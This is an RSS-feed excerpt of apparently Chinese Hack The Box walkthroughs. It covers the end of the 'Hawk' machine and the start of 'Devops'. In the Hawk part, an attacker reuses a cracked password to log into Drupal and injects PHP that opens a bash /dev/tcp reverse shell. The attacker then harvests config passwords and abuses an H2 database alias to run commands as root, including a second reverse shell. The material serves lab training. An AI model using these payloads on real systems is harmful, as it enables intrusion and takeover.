&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python2 brute.py /usr/share/wordlists/rockyou.txt ciphers.txt drupal.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_ZIH-1WkLLu_huc965a0b675319ef7784f3a7cb953c71a_212820_f0903b7139b9a9e4524de90bf1058c92.webp 400w,
/post/hackbox/hawk/image/image_ZIH-1WkLLu_huc965a0b675319ef7784f3a7cb953c71a_212820_85658203bc0a952832307b6dc8875518.webp 760w,
/post/hackbox/hawk/image/image_ZIH-1WkLLu_huc965a0b675319ef7784f3a7cb953c71a_212820_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_ZIH-1WkLLu_huc965a0b675319ef7784f3a7cb953c71a_212820_f0903b7139b9a9e4524de90bf1058c92.webp"
width="1415"
height="656"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>获得密码：&lt;code>PencilKeyboardScanner123&lt;/code>&lt;/p>
&lt;p>80端口，&lt;code>Drupal&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_fMSmrJvab5_hu90e4da97b74d691aeea03d4abca5257d_73130_fa732f9fd68603a398201e36f9c05284.webp 400w,
/post/hackbox/hawk/image/image_fMSmrJvab5_hu90e4da97b74d691aeea03d4abca5257d_73130_950b25fa9b08493178afde54730bfd91.webp 760w,
/post/hackbox/hawk/image/image_fMSmrJvab5_hu90e4da97b74d691aeea03d4abca5257d_73130_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_fMSmrJvab5_hu90e4da97b74d691aeea03d4abca5257d_73130_fa732f9fd68603a398201e36f9c05284.webp"
width="1075"
height="719"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现ftp获得的密码就是Drupal的后台密码&lt;/p>
&lt;p>&lt;code>admin/PencilKeyboardScanner123&lt;/code>&lt;/p>
&lt;p>发现可以启动&lt;code>PHP filter&lt;/code>模块&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_FdujANC8t1_hu5d59db78f1805e9ad25f882c5c8238f9_129507_56ca030d6d95eb8d88ec338f77e0ae1f.webp 400w,
/post/hackbox/hawk/image/image_FdujANC8t1_hu5d59db78f1805e9ad25f882c5c8238f9_129507_6f66130db65a0706151a44f7bf33b177.webp 760w,
/post/hackbox/hawk/image/image_FdujANC8t1_hu5d59db78f1805e9ad25f882c5c8238f9_129507_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_FdujANC8t1_hu5d59db78f1805e9ad25f882c5c8238f9_129507_56ca030d6d95eb8d88ec338f77e0ae1f.webp"
width="1161"
height="561"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>可以解析文档中的php代码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_VFAXuoqxum_hu4fd0e8b1b9fe27b29485173fcba40cff_96984_3663658c18f74ec069b8dcf87b4b63cb.webp 400w,
/post/hackbox/hawk/image/image_VFAXuoqxum_hu4fd0e8b1b9fe27b29485173fcba40cff_96984_1f23e7e162673ddb21ddbc895c1231d1.webp 760w,
/post/hackbox/hawk/image/image_VFAXuoqxum_hu4fd0e8b1b9fe27b29485173fcba40cff_96984_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_VFAXuoqxum_hu4fd0e8b1b9fe27b29485173fcba40cff_96984_3663658c18f74ec069b8dcf87b4b63cb.webp"
width="1223"
height="402"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>反弹shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&amp;lt;?php
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;hack!!!&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> exec&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;bash -c &amp;#39;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.14.2/2333 0&amp;gt;&amp;amp;1&amp;#39;&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">?&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>保存就直接执行了&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_ubVzHfXi64_hu5e30b66ff1b9626ea139d46f351647f8_52762_909758404935cee27893b2535c488c92.webp 400w,
/post/hackbox/hawk/image/image_ubVzHfXi64_hu5e30b66ff1b9626ea139d46f351647f8_52762_4112f6feaf5e87e1cedba3576891d8fb.webp 760w,
/post/hackbox/hawk/image/image_ubVzHfXi64_hu5e30b66ff1b9626ea139d46f351647f8_52762_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_ubVzHfXi64_hu5e30b66ff1b9626ea139d46f351647f8_52762_909758404935cee27893b2535c488c92.webp"
width="998"
height="548"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_dxm-M7DEYi_hu0faf539df46521adc16e4240f9cf4bac_58127_74e827257f3c16398305103894304e7c.webp 400w,
/post/hackbox/hawk/image/image_dxm-M7DEYi_hu0faf539df46521adc16e4240f9cf4bac_58127_914027e6be62faf24087cb3fa81b3151.webp 760w,
/post/hackbox/hawk/image/image_dxm-M7DEYi_hu0faf539df46521adc16e4240f9cf4bac_58127_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_dxm-M7DEYi_hu0faf539df46521adc16e4240f9cf4bac_58127_74e827257f3c16398305103894304e7c.webp"
width="958"
height="220"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>敏感信息收集，从代码中找到了密码 &lt;code>drupal4hawk&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">find /var/www/html/ -name &lt;span class="s1">&amp;#39;*.php&amp;#39;&lt;/span>&lt;span class="p">|&lt;/span>xargs grep &lt;span class="s1">&amp;#39;password&amp;#39;&lt;/span> 2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_NN1r2Gb0-g_hu4cf3b5e50a94a1b21b29a0022d42a1e9_173091_da623b199e306c5a8778fe53ccb2ed7b.webp 400w,
/post/hackbox/hawk/image/image_NN1r2Gb0-g_hu4cf3b5e50a94a1b21b29a0022d42a1e9_173091_45876c12d242a17d275ae9ce71bd1154.webp 760w,
/post/hackbox/hawk/image/image_NN1r2Gb0-g_hu4cf3b5e50a94a1b21b29a0022d42a1e9_173091_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_NN1r2Gb0-g_hu4cf3b5e50a94a1b21b29a0022d42a1e9_173091_da623b199e306c5a8778fe53ccb2ed7b.webp"
width="1243"
height="406"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>./sites/default/settings.php&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_xZYvT115uB_hu67c371cc961a86fdd96acd2f8f1a6dac_55817_70a7a627c46d8c104b9adba331b9c496.webp 400w,
/post/hackbox/hawk/image/image_xZYvT115uB_hu67c371cc961a86fdd96acd2f8f1a6dac_55817_4b296eb0d7f7edae543dfeff6b9c3b2f.webp 760w,
/post/hackbox/hawk/image/image_xZYvT115uB_hu67c371cc961a86fdd96acd2f8f1a6dac_55817_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_xZYvT115uB_hu67c371cc961a86fdd96acd2f8f1a6dac_55817_70a7a627c46d8c104b9adba331b9c496.webp"
width="643"
height="440"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>除了mysql，可能其他用户也使用了这个密码，最后试到ssh用户密码是&lt;code>daniel/drupal4hawk&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_x08BZkubAX_hu642af45dd2333476dc5ee15cfc37af7f_163880_482e8ebc6d2bb8bd346a7bdff6e1cef4.webp 400w,
/post/hackbox/hawk/image/image_x08BZkubAX_hu642af45dd2333476dc5ee15cfc37af7f_163880_615c489f4adefb7127311ce6b2d2129d.webp 760w,
/post/hackbox/hawk/image/image_x08BZkubAX_hu642af45dd2333476dc5ee15cfc37af7f_163880_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_x08BZkubAX_hu642af45dd2333476dc5ee15cfc37af7f_163880_482e8ebc6d2bb8bd346a7bdff6e1cef4.webp"
width="921"
height="716"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>切到bash&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">import pty&lt;span class="p">;&lt;/span>pty.spawn&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;/bin/bash&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_gGPDPMFL6E_hue580197ce5508d6b75d5e8446b5e28b7_27145_8882be1dbcdc6aa90438431de3c9b9a2.webp 400w,
/post/hackbox/hawk/image/image_gGPDPMFL6E_hue580197ce5508d6b75d5e8446b5e28b7_27145_0c9a9b9e4baa112b2d3cd1d6faf9ea58.webp 760w,
/post/hackbox/hawk/image/image_gGPDPMFL6E_hue580197ce5508d6b75d5e8446b5e28b7_27145_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_gGPDPMFL6E_hue580197ce5508d6b75d5e8446b5e28b7_27145_8882be1dbcdc6aa90438431de3c9b9a2.webp"
width="536"
height="152"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权&lt;/p>
&lt;p>8082端口只允许本地访问，使用ssh把流量转发出去&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_4xAVWjZL6J_hu8cc38022d9aa014f5cdbe3a1de6155d3_111031_91f9204deec92bf982ac429082200c30.webp 400w,
/post/hackbox/hawk/image/image_4xAVWjZL6J_hu8cc38022d9aa014f5cdbe3a1de6155d3_111031_019f388ce6771b9991c6baf3aaa4b2b4.webp 760w,
/post/hackbox/hawk/image/image_4xAVWjZL6J_hu8cc38022d9aa014f5cdbe3a1de6155d3_111031_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_4xAVWjZL6J_hu8cc38022d9aa014f5cdbe3a1de6155d3_111031_91f9204deec92bf982ac429082200c30.webp"
width="1238"
height="464"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_FDqn2c4Tgq_hu531de9f4c5e523f3f990973602d8ab94_33650_127ffb01759b4879acdec5932799b6c6.webp 400w,
/post/hackbox/hawk/image/image_FDqn2c4Tgq_hu531de9f4c5e523f3f990973602d8ab94_33650_84e9c4af43522eaa31e7970f7315884b.webp 760w,
/post/hackbox/hawk/image/image_FDqn2c4Tgq_hu531de9f4c5e523f3f990973602d8ab94_33650_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_FDqn2c4Tgq_hu531de9f4c5e523f3f990973602d8ab94_33650_127ffb01759b4879acdec5932799b6c6.webp"
width="855"
height="250"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ssh -L 8888:127.0.0.1:8082 daniel@10.10.10.102
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>访问本地8082&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_N1aUqyyBua_hubcbaacb52cf94f3cd8248fa0420d2406_62797_79e870562c7cb21fc48d7bd2c46e9405.webp 400w,
/post/hackbox/hawk/image/image_N1aUqyyBua_hubcbaacb52cf94f3cd8248fa0420d2406_62797_726c48c68ae91e13a44c0990307a6156.webp 760w,
/post/hackbox/hawk/image/image_N1aUqyyBua_hubcbaacb52cf94f3cd8248fa0420d2406_62797_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_N1aUqyyBua_hubcbaacb52cf94f3cd8248fa0420d2406_62797_79e870562c7cb21fc48d7bd2c46e9405.webp"
width="856"
height="515"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>将jdbc url指定到root目录，直接连接&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_3IsVVlldrU_hu1b5f796b1e086ce3de659e395875206f_27639_6b8a665fd747b05bb5c15746345563b9.webp 400w,
/post/hackbox/hawk/image/image_3IsVVlldrU_hu1b5f796b1e086ce3de659e395875206f_27639_5d2cd23f4b696b791110dc327047b510.webp 760w,
/post/hackbox/hawk/image/image_3IsVVlldrU_hu1b5f796b1e086ce3de659e395875206f_27639_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_3IsVVlldrU_hu1b5f796b1e086ce3de659e395875206f_27639_6b8a665fd747b05bb5c15746345563b9.webp"
width="514"
height="350"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>连接成功：&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_zin9N4akxy_huc8c3b4439d2dc14c90518742a5a18250_133520_5f8f061f26fba2a23ae53df9fa4ac44c.webp 400w,
/post/hackbox/hawk/image/image_zin9N4akxy_huc8c3b4439d2dc14c90518742a5a18250_133520_2c3db770bfeb80b926a06593f238b600.webp 760w,
/post/hackbox/hawk/image/image_zin9N4akxy_huc8c3b4439d2dc14c90518742a5a18250_133520_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_zin9N4akxy_huc8c3b4439d2dc14c90518742a5a18250_133520_5f8f061f26fba2a23ae53df9fa4ac44c.webp"
width="1046"
height="749"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里有个注入问题：&lt;/p>
&lt;p>&lt;a href="https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html" target="_blank" rel="noopener">https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html&lt;/a>&lt;/p>
&lt;p>创建一个执行命令的函数 &lt;code>SHELLEXEC111&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">CREATE ALIAS SHELLEXEC111 AS &lt;span class="nv">$$&lt;/span> String shellexec&lt;span class="o">(&lt;/span>String cmd&lt;span class="o">)&lt;/span> throws java.io.IOException &lt;span class="o">{&lt;/span> java.util.Scanner &lt;span class="nv">s&lt;/span> &lt;span class="o">=&lt;/span> new java.util.Scanner&lt;span class="o">(&lt;/span>Runtime.getRuntime&lt;span class="o">()&lt;/span>.exec&lt;span class="o">(&lt;/span>cmd&lt;span class="o">)&lt;/span>.getInputStream&lt;span class="o">())&lt;/span>.useDelimiter&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;\\A&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="k">return&lt;/span> s.hasNext&lt;span class="o">()&lt;/span> ? s.next&lt;span class="o">()&lt;/span> : &lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="o">}&lt;/span>&lt;span class="nv">$$&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_0_di4f5FfE_hu2b75b267c3927c91731e7aeb7d0cc312_66775_f482b9e09c6060d7994daa4a19d9973f.webp 400w,
/post/hackbox/hawk/image/image_0_di4f5FfE_hu2b75b267c3927c91731e7aeb7d0cc312_66775_22d0519d105895ed3af1ba4d15d183a3.webp 760w,
/post/hackbox/hawk/image/image_0_di4f5FfE_hu2b75b267c3927c91731e7aeb7d0cc312_66775_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_0_di4f5FfE_hu2b75b267c3927c91731e7aeb7d0cc312_66775_f482b9e09c6060d7994daa4a19d9973f.webp"
width="1079"
height="367"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>调用函数&lt;code>SHELLEXEC111&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">call SHELLEXEC111&lt;span class="o">(&lt;/span>&lt;span class="s1">&amp;#39;id&amp;#39;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_CYsFbkkW8h_hu37888584eea329c01da5c7e7e4f153ca_31001_41657b6b7a9f241bf71f1f15e645fee5.webp 400w,
/post/hackbox/hawk/image/image_CYsFbkkW8h_hu37888584eea329c01da5c7e7e4f153ca_31001_cacbcd08b5de0a55242acb556542d4d0.webp 760w,
/post/hackbox/hawk/image/image_CYsFbkkW8h_hu37888584eea329c01da5c7e7e4f153ca_31001_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_CYsFbkkW8h_hu37888584eea329c01da5c7e7e4f153ca_31001_41657b6b7a9f241bf71f1f15e645fee5.webp"
width="666"
height="296"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>反弹shell&lt;/p>
&lt;p>在daniel下创建一个shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">daniel@hawk:~$ cat /home/daniel/shell
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">bash -i &amp;gt;&lt;span class="p">&amp;amp;&lt;/span> /dev/tcp/10.10.14.2/2444 0&amp;gt;&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">daniel@hawk:~$ chmod +x /home/daniel/shell
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">daniel@hawk:~$
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>使用root执行/home/daniel/shell &lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">call SHELLEXEC111&lt;span class="o">(&lt;/span>&lt;span class="s1">&amp;#39;bash /home/daniel/shell&amp;#39;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_YQNgBuMcj3_hu4d4ad2102b0734dd9ecb6e235de3affd_39425_0816cfabbf6557ded2338ee2636740a6.webp 400w,
/post/hackbox/hawk/image/image_YQNgBuMcj3_hu4d4ad2102b0734dd9ecb6e235de3affd_39425_78084ee1c61378b76aca248bfcb5422f.webp 760w,
/post/hackbox/hawk/image/image_YQNgBuMcj3_hu4d4ad2102b0734dd9ecb6e235de3affd_39425_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_YQNgBuMcj3_hu4d4ad2102b0734dd9ecb6e235de3affd_39425_0816cfabbf6557ded2338ee2636740a6.webp"
width="852"
height="262"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/hawk/image/image_RnvkIoWzIp_hu4b99b2c387c59bfd66f36e0b2f8b4c04_54737_4fadbfb3aecde133a77f2e0bfe94c16d.webp 400w,
/post/hackbox/hawk/image/image_RnvkIoWzIp_hu4b99b2c387c59bfd66f36e0b2f8b4c04_54737_9a42738c78eb5d5ca360ab03f055a541.webp 760w,
/post/hackbox/hawk/image/image_RnvkIoWzIp_hu4b99b2c387c59bfd66f36e0b2f8b4c04_54737_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/hawk/image/image_RnvkIoWzIp_hu4b99b2c387c59bfd66f36e0b2f8b4c04_54737_4fadbfb3aecde133a77f2e0bfe94c16d.webp"
width="976"
height="255"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Devops</title><link>https://docs.kaiasec.tk/post/hackbox/devops/</link><pubDate>Fri, 17 Jun 2022 16:56:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/devops/</guid><description>&lt;h1 id="devops">Devops&lt;/h1>
&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nmap -r -p- -vv -sV 10.10.10.91
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_D0A3SXFGxc_hude54924b7f78fb157a70c8759867e4e7_187959_10150f30b69e6c97cf081f1f97ace765.webp 400w,
/post/hackbox/devops/image/image_D0A3SXFGxc_hude54924b7f78fb157a70c8759867e4e7_187959_ce809dd267e691ed521cfad0ec7a6fea.webp 760w,
/post/hackbox/devops/image/image_D0A3SXFGxc_hude54924b7f78fb157a70c8759867e4e7_187959_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_D0A3SXFGxc_hude54924b7f78fb157a70c8759867e4e7_187959_10150f30b69e6c97cf081f1f97ace765.webp"
width="1188"
height="325"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>5000端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_KGThTpwmek_hu946797bbbfeee980e5c50458e37301b6_205760_47146dd8198700008692d49eed01f50d.webp 400w,
/post/hackbox/devops/image/image_KGThTpwmek_hu946797bbbfeee980e5c50458e37301b6_205760_8ff1daf300af0afae18ee169e080038c.webp 760w,
/post/hackbox/devops/image/image_KGThTpwmek_hu946797bbbfeee980e5c50458e37301b6_205760_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_KGThTpwmek_hu946797bbbfeee980e5c50458e37301b6_205760_47146dd8198700008692d49eed01f50d.webp"
width="911"
height="672"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>扫描web目录&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_-UT2qbjMnb_hu9f1da66ae0805022adb5bda2ccd4f500_15991_d5e723536d8ef426da1bacde35027a4c.webp 400w,
/post/hackbox/devops/image/image_-UT2qbjMnb_hu9f1da66ae0805022adb5bda2ccd4f500_15991_8e69a7dcfad5a2ff3211d175126efa90.webp 760w,
/post/hackbox/devops/image/image_-UT2qbjMnb_hu9f1da66ae0805022adb5bda2ccd4f500_15991_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_-UT2qbjMnb_hu9f1da66ae0805022adb5bda2ccd4f500_15991_d5e723536d8ef426da1bacde35027a4c.webp"
width="835"
height="190"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现上传xml功能&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/devops/image/image_94QIpNn7cD_hu676408a19549363a8be7e4d44cc7536d_38421_f04c24c999d5aff47fe974fb6a23f7aa.webp 400w,
/post/hackbox/devops/image/image_94QIpNn7cD_hu676408a19549363a8be7e4d44cc7536d_38421_c643f2f805276936d4b7861c20ca1a04.webp 760w,
/post/hackbox/devops/image/image_94QIpNn7cD_hu676408a19549363a8be7e4d44cc7536d_38421_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/devops/image/image_94QIpNn7cD_hu676408a19549363a8be7e4d44cc7536d_38421_f04c24c999d5aff47fe974fb6a23f7aa.webp"
width="616"
height="286"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>上传发现直接解析了xml，并返回路径&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="line">&lt;span class="cl">&lt;span class="cp">&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;data&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;Author&amp;gt;&lt;/span>max&lt;span class="nt">&amp;lt;/Author&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;Subject&amp;gt;&lt;/span>test&lt;span class="nt">&amp;lt;/Subject&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;Content&amp;gt;&lt;/span>hello&lt;span class="nt">&amp;lt;/Content&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nt">&amp;lt;/data&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
